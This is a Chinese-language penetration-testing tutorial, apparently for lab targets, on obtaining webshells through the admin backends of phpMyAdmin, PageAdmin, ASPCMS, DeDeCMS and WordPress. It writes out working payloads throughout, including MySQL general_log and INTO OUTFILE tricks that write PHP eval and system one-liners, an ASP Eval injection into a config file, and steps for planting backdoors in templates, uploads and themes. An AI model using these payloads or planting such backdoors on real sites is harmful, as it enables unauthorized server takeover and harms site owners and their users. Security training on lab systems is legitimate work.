常见的CMS漏洞解析！

PhPMyadmin：

   姿势⼀：通过日志文件拿Shell

              利用mysql日志文件写shell，这个日志可以在mysql里改变它的存放位置，登录phpmyadmin可以修改

这个存放位置，并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取⼀个webshell

set global general_log='on'; //⽇志保存状态开启；

set global general_log_file = 'C:/phpStudy/PHPTutorial/WWW/mafa.php'//修 
改⽇志的保存位置

写入一句话木马select '<?php eval($_POST["admin"]);?>';

使用蚁剑连接日志路径 

连接成功

姿势二：导入导出拿WebShell 

通过SQL语句拿webshell ⽤ into outfile 把后门写到⽹站目录上。

⾸先判断mysql位置

写webshell 
select "<?php eval($_POST[a]);?>" into outfile 'c:/phpstudy/www/b.php'; 
select "<?php system($_GET[a]);?>" into outfile 'c:/phpstudy/PHPTutorial/w 
ww/d.php';

浏览器访问并用蚁剑连接 

连接成功

姿势三：界面图像化GetShell 

如果过滤了 into outfile 第⼀种的图形化操作...phpmyadmin管理台

变量：⽇志 搜索：gen              log:on

file:C:\phpStudy\PHPTutorial\www\c.php 修改路径

sql: 
select "<?php eval($_POST[a]);?>";

蚁剑连接

连接成功

----------------------------------------

Pageadmin

         姿势一：上传文件解压拿WebShell

打开网站后台

选择文件管理 

创建一个asp木马文件 

压缩为zip文件

上传 

解压 

访问连接一句话木马 

连接成功

------------------------------------

ASPCMS

          简介：ASPCMS是由上谷网络开发的全新内核的开源企业建站系统，能够胜任企业多种建站需求，并且支持模版自定义、支持扩展插件等等，能够在短时间内完成 企业建站。

姿势一：后台修改配置文件拿Shell

           访问以下地址为ASPCMS...并登陆到后台（这⾥注意在搭建站点的时候注意权限问题）

点击 【扩展功能】 --> 【幻灯片设置】 -->点击 【保存】 -->开启代理进行抓包 

在抓取的数据包中修改 slideTextStatus 字段的值为以下代码并进⾏发包查看被修改的asp文件内容... 

1%25><%25Eval(Request (chr(65)))%25><%25 密码是a 
#影响⽂件 /config/AspCms_Config.asp

放包修改成功 

访问/config/AspCms_Config.asp进行连接 

连接成功

-------------------------------------

DeDeCMS

          简介：DedeCMS是织梦团队开发PHP 网站管理系统，它以简单、易用、高效为特色，组建出各种各样各具特色的网站，如地方门户、行业门户、政府及企事业站点等。

姿势一：通过文件管理器上传WebShell

访问目标靶场其思路为 dedecms 后台可以直接上传任意文件，可以通过文件管理器上传php文件获webshell

登陆到后台点击 【核心】 -->【文件式管理器】 -->【文件上传】 将准备好的⼀句话代码上传...OK 

访问上传成功后的文件并使用蚁剑连接测试. 

连接成功

姿势二：修改模板文件拿WebShell

 与WPCMS类似，直接修改模板拿WebShell..点击 【模板】 --> 【默认模板管理】-->【index.htm】 -->【修改】 在文件修改中添加一句话代码....如下

点击 【生成】 -->更新主页HTML】 -->将主页位修改为 ../index.php --> 点击 【生成静态】 -->点击 【更新主页】 再次访问站点首页可发现变化... 

访问使用蚁剑进行连接测试..

连接成功

姿势三：后台任意命令执行拿WebShell

步骤⼀：点击 【模块】 --> 【广告管理】 --> 【增加⼀个新广告】 -->在 【广告内容】 处添

加⼀句话代码-->点击 确定】

点击【代码】-->在图中显示的路径与站点进行拼接....访问测试!

访问使用蚁剑连接 

连接成功

WordPress 

               简介：WordPress是⼀个以PHP和MySQL为平台的⾃由开源的博客软件和内容管理系统。WordPress具有插件架构和模板系统。截⾄2018年4⽉，排名前1000万的⽹站中超过30.6%使⽤WordPress。WordPress是最受欢迎的⽹站 内容管理系统。全球有⼤约30%的⽹站(7亿5000个)都是使用，WordPress架设⽹站的。WordPress是目前 因特⽹上最流⾏的博客系统。WordPress在最著名的⽹络发布阶段中脱颖⽽出。如今，它被使⽤在超过7000万个站点上。

 

 姿势⼀：后台修改模板拿WebShell

            步骤⼀：进⼊Vulhub靶场并执⾏以下命令开启靶场；在浏览器中访问并安装好....

步骤二：思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShell；登陆WP后点击[外观] -->[编辑] --> 404.php

步骤三：在其404模板中插⼊⼀句话木马代码..点击【更新文件】 按钮

访问以下连接即可获取WebShell....

/wp-content/themes/twentyfifteen/404.php

 

 蚁剑连接

连接成功

姿势二：上传主题拿WebShell 

步骤⼀：接着上⼀个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP⽂件...点击

【外观】 -->【主题】 -->【添加】 --> 【上传主题】 -->【浏览】 --> 【现在安装】

安装主题模版下载下来查看里面

将他的404.php文件改为木马文件然后上传 

安装成功后访问主题下的网站后门文件..

/wp-content/themes/storeflex/404.php

连接成功